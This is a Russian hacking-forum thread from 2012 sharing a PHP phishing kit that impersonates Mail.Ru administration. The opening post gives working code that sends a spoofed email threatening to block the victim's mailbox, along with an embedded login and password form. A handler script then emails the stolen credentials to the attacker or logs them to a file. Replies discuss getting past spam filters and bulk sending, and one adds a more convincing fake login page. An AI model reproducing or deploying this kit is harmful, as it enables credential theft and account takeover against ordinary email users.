Красивый фейк в теле письма + отправка от @corp.mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by kravch_v, 4 Feb 2012.

  1. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Нам понадобиться следующее:
    • Хостинг с поддержкой PHP
    • Создать два файла .php

    1) index.php - отправка фейка на почту жертвы
    PHP:
    <?php
    $subject
    ="Сабж"//Тема
    $header="Content-type: text/html; charset=windows-1251 \r\n"//Кодировка
    $header.="From: Администрация Mail.Ru <[email protected]>\r\n"//От кого отправляем
    $header.="Subject: $subject \r\n";
    $header.="Content-type: text/html; charset=windows-1251 \r\n";
    $msg="<body>
    <table width=100% height=40 cellpadding=0 cellspacing=0 class=blue  bgcolor='#00468C'>
    <td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>
    <td class=logo><img src=http://img.mail.ru/r/blogs/prjlogo_mail.gif width=104 height=21></td>
    <td width=100%> </td>
    <td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>
    </table>
    <br>
    <b>Уважаемый пользователь [email protected]!</b><br>
    [Тут ваш текст]<br>
    <b><font color='#ff0000'>Иначе мы заблокируем ваш почтовый ящик!</font></b><br><br>
    <b>Заполните нижеприведенную форму:</b> <br>
    <form method='post' action='http://ссылка_на_ваш_фейк/form.php'>
    <table width='400px' cellpadding=0 cellspacing=0>
    <tr><td><b>Логин: </b></td><td><input type='text' name='login'>@mail.ru<br></td></tr>
    <tr><td><b>Пароль: </b></td><td><input type='password' name='pass'><br></td></tr>
    <tr><td><b>Подтвердите пароль: </b></td><td><input type='password' name='pass2'><br></td></tr>
    </table>
    <input type='submit' value='Go'>
    </form><br> <br>
    Спасибо за то, что Вы являетесь пользователем Mail.Ru.<br>
    С уважением, администрация Mail.ru
    <br><br><br><br><br></body>"
    ;
    mail('[email protected]'$subject$msg$header); //[email protected] - почта жертвы
    ?>
    2) form.php - обработчик
    Вариант #1 - Данные с фейка будут идти вам на почту
    PHP:
    <?php
    $header
    ="Content-type: text/html; charset=windows-1251 \r\n";
    $header.="Content-type: text/html; charset=windows-1251 \r\n";    

    $msg $_POST['login'];
    $subject  'логин: '.$_POST['login'].'<br>';
    $subject .= 'пароль: '.$_POST['pass'].'<br>';

    mail("[email protected]"$msg$subject$header); //[email protected] - куда будут идти данные с фейка
    $location $_SERVER['HTTP_REFERER'];
    header("Location: http://ссылка_переадресации");
    ?>
    Вариант #2 - Данные с фейка будут сохраняться на вашем хостинге
    PHP:
    <?php
    $login 
    $_POST['login'];
    $pass $_POST['pass'];
    {
    $fo fopen("file.txt""a+"); 
    fwrite($fo"$login:$pass<br />\n"); 
    fclose($fo); 
    }
    $location $_SERVER['HTTP_REFERER']; 
    header("Location: http://ссылка_переадресации");
    ?>
    Скриншот:
    [​IMG]

    P.S. Если есть ошибки в скриптах - напишите - исправлю.
    P.SS. Текст фейка отредактируйте по своему желанию.
    Спасибо за внимание! ;)
     
    #1 kravch_v, 4 Feb 2012
    Last edited: 4 Feb 2012
    marynli and Zombi **** like this.
  2. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    На ман ни как не тянет...
     
  3. Indev

    Indev New Member

    Joined:
    23 Dec 2011
    Messages:
    59
    Likes Received:
    3
    Reputations:
    0
    Однако полезно)

    Только вопрос: куда надо ложить "form.php"?
     
  4. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    желательно в одну директорию с "index.php"
     
  5. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    спасибо полезно. попробую переписать на перле что бы можно было слать с компа по списку и с потоками
     
  6. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    form.php ложить можно куда угодно, главное указать к нему путь ;)
     
  7. Nikpsih

    Nikpsih New Member

    Joined:
    13 Sep 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Хм, все вроде сделал как надо, на gmail письмо летит, но вот с мэйлом проблема - ничего не приходит.
     
  8. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Странно. Письмо вообще не приходит или приходит в папку спам?
     
  9. Nikpsih

    Nikpsih New Member

    Joined:
    13 Sep 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Вообще не приходят. Может пофиксили?
     
  10. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Хм, может и пофиксили.
    Буду искать решение этой проблемы.
     
  11. Nikpsih

    Nikpsih New Member

    Joined:
    13 Sep 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Вобщем блочит если в поле "от кого" содержится "админимтрация", "administration". Если везде писать чушь и оставить "mail.ru" то все норм, идет. Если оставить "corp.mail.ru" то летит в спам. Такая бяда.

    UPD. Теперь летит в спам почти все. И пофиксили все варианты, которые смог придумать, где содержалось mail.ru, в том числе с заменой англ символов на аналогичные и хоть немного похожие рус. Письма с "corp.mail.ru" тоже не идут теперь.

    Скорее всего блочат только по этому полю, все остальное норм пролетает.
     
    #11 Nikpsih, 7 Feb 2012
    Last edited: 7 Feb 2012
  12. m2bantoha

    m2bantoha New Member

    Joined:
    17 Oct 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Кто поможет мне его настроить да и обьяснить как все правельно делать!
    SOS в ICQ 67777771
     
  13. Sitis

    Sitis New Member

    Joined:
    5 Dec 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Интересный фейк. Есть правда заминка. Не подскажите, чем можно объяснить такое отображение?
     
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    код сендера поправь, заголовки послипались
     
  15. Sitis

    Sitis New Member

    Joined:
    5 Dec 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Учитывая то, что все остальные фейки он шлёт без проблем, незнаю как и что в нём исправлять.
     
  16. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    да это уже не тема.. есть более крутой вариант, и в спам никогда не попадёт
     
  17. daradan

    daradan New Member

    Joined:
    27 Aug 2010
    Messages:
    56
    Likes Received:
    3
    Reputations:
    0
    поделишься?
     
  18. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    приваД ;) да шучу.. как нибудь на досуге возможно скину
     
  19. volfer94

    volfer94 New Member

    Joined:
    13 Jan 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    а как его в почту отправить то я что то понять не могу
     
  20. _zenon

    _zenon New Member

    Joined:
    10 Feb 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Вот, вчера подкорректировал

    YouPic.ru

    HTML:
    <table width=100% height=40 cellpadding=0 cellspacing=0 class=blue  bgcolor='#00468C'> 
    <td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td> 
    <td class=logo><img src=http://img.mail.ru/r/blogs/prjlogo_mail.gif width=104 height=21></td> 
    <td width=100%> </td> 
    <td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td> 
    </table>
    <TABLE id="first_let" cellSpacing="0" cellPadding="0" width="100%">
              <TD width="75%">
    		  
              <h4>Уважаемый <font color="red">Пользователь!</font></h4>
    Ваш почтовый адрес, попал в системну фильтрации запрещенной корреспонденции почтовой службы <a href="http://mail.ru">Mail.ru.</a><br>
    Согласно пункту 7.4 <a href="http://help.mail.ru/mail-help/UA">пользовательского соглашения</a>, компания Mail.ru оставляет за собой право временно приостановить,<br>
    либо прекратить предоставление услуг, своевременно уведомив об этом пользователя.<br>
    Руководствуясь <a href="http://www.ukru.ru/code/07/130/index.htm">ст.130 УК РФ</a>, пройдя процедуру контрольной авторизации, Вы подтверждаете следующее:<br>
    <ul><b>
    <li>
    Что не распространяете рассылки о различных услугах. <br><li>
    Не являетесь рассыльщиком оскорбительных и рекламных писем.<br><li>
    Действуете в рамках проекта.<br><li>
    Что оповещены о поступившем предупреждении.</li></b></ul>
    Ваш ящик автоматически исключается из чёрных фильтров нашего сервиса, т.к. этим действием Вы подтверждаете прочтение данного письма.<br>
    Помните! Если Вам приходят письма явно рекламного, оскорбительного содержания, у Вас есть возможность <a href="http://help.mail.ru/mail-help/spam/complain">пожаловаться</a> на его содержимое,<br> 
    Администрация ресурса изучает все жалобы и модифицирует фильтрующие алгоритмы для новых видов подобных писем.<br><br>
    <font color="red"><b>ВНИМАНИЕ!</b></font> Проигнорировав данное письмо, Вы рискуете быть отстронёнными от управления Вашим почтовым ящиком,<br>
    до выяснения более подробных обстоятельств.
           </TD>
              
              <TD width="25%">
                <TABLE class="wlcBlock" cellSpacing="0" cellPadding="0" width="100%">
                  <TBODY>
                  <h4><font color="red">Подтверждение Аккаунта</font></h4>
                  <td width="100"></td>
                  <TR>
                    <TD class="wlcBlockMail" colSpan="2"><br>
               
    <!-- sln: authform -->
    
    <form name="Auth" method="post" action="" style="overflow: hidden;">
    <img src="http://r2.mail.ru/b13427068.gif" width="200" height="18" usemap="#logbms" alt="" /><br />
    <map name="logbms" id="logbmsid"><area shape="rect" coords="109,1,220,18" href="http://agent.mail.ru" alt="Агент" name="cln9550"></area><area shape="default" nohref="nohref" alt=""></area></map>
    
    <table id="authorization_table" class="authorization">
        <tr>
            <td colspan="2" class="registration">
                
    
                
    
            </td>
        </tr>
    
        <tr>
            
            <td class="mail">
                <table>
                    <tr>
                        <td class="login"><input type="text" class="long" size="10" name="log" tabindex="3" value="Login" /></td>
                        <td class="domain"><select size="1" name="Domain" class="long" tabindex="4">
    <option value="mail.ru"
    >@mail.ru</option><option value="inbox.ru"
    >@inbox.ru</option><option value="bk.ru"
    >@bk.ru</option><option value="list.ru"
    >@list.ru</option>
    
    </select></td>
                    </tr>
                </table>
            </td>
        </tr>
        <tr>
            
            <td class="pswd">
                <div id="tooltipAuth_shell" class="tooltip" style="display: none;"><div id="tooltipAuth_tail" class="tail"></div><div class="ltc"></div><div class="rtc"></div><div class="ts"></div><div class="inner"><div class="rborder"><div id="tooltipAuth_mess" class="mess"><span id="tooltipAuth_mess_var">Вы вводите<br />русские буквы</span><span id="tooltipAuth_mess_var2" style="display: none;">Включен<br />Caps Lock</span><span id="tooltipAuth_mess_var3" style="display: none;">Пароль содержит<br />русские буквы</span></div><div id="tooltipAuth_struter" class="struter"></div></div></div><div class="lbc"></div><div class="rbc"></div><div class="bs"></div></div>
    
                <table>
                    <tr>
                        <td><input type="password" class="Password" size="15" name="pass" tabindex="5"
    value="Password" /></td>
                        <td class="forget"><div><a href="http://e.mail.ru/cgi-bin/passremind" tabindex="8" name="cln9554">Забыли?</a></div></td>
                    </tr>
                </table>
            </td>
        </tr>
    
        
            
            <td class="button"><table><tr><td class="bad"  style="white-space: nowrap;"></td><td class="submit"><input type="submit" value="Подтвердить" tabindex="6" class="submit" style="width: 100px; text-align: center; padding: 0;" /></td></tr></table></td>
        </tr>
    </table>
    
    </form>
    
    <!-- sln: authform -->
    
    
    
    
    
    
    </TD></TR>
                  </TBODY></TABLE></TD></TR>      
            </TBODY></TABLE><br>
    		<td width="100"></td>
             <img id="welcome_img" src="http://rs.mail.ru/d275885.gif" />
    		 
    	<br><br>
    		<div class="footer__links footer__links_right">
    		 <center><a class="footer__links__link" href="http://r.mail.ru/cln9076/e.mail.ru/cgi-bin/signup">Регистрация</a>
    			<a name="clb616575" href="http://corp.mail.ru/" class="footer__links__link">Mail.Ru</a>&nbsp;<strong>·</strong>&nbsp;<a class="footer__links__link" onmousedown="__rc(this, 9931);" href="http://corp.mail.ru/career/vacancies/" target="_blank">Вакансии</a>
    			&nbsp;<strong>·</strong>&nbsp;
    			<a class="footer__links__link" onmousedown="__rc(this, 9063);" href="http://my.mail.ru/community/mailru/" target="_blank">Cообщество пользователей</a>
    			&nbsp;<strong>·</strong>&nbsp;
    			<a class="footer__links__link" onmousedown="__rc(this, 9064);" href="http://help.mail.ru/mail-support" target="_blank">Служба поддержки</a>
    			&nbsp;<strong>·</strong>&nbsp;
    			<a class="footer__links__link" onmousedown="__rc(this, 9062);" href="http://help.mail.ru/mail-help" target="_blank">Помощь</a></center><br>
    			<center>© 1999—2012</center>
    		</div>
     
    #20 _zenon, 11 Feb 2012
    Last edited: 11 Feb 2012